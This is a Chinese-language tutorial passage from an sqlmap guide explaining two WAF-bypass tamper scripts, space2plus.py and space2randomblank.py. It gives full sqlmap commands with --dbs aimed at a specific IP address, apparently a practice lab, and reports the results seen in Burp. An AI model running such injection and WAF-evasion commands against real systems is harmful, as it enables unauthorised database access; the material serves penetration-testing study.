sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

46. space2plus.py脚本

通过使用"+"来替换空格适用于所有数据库

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2plus.py" --proxy="http://127.0.0.1:8080" -batch

没有注入成功，我们看看burp抓包情况

sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

确认效果是没问题的，使用+衔接

==================================================================================================================================================

47. space2randomblank.py脚本

使用类似%09,%0A,%0C,%0D随机字符串替换payload中的空格

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2randomblank.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

确认是可以成功注入，那么我们看看burp的抓包情况

sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

确实添加了%0A %0C等随机字符串进行注入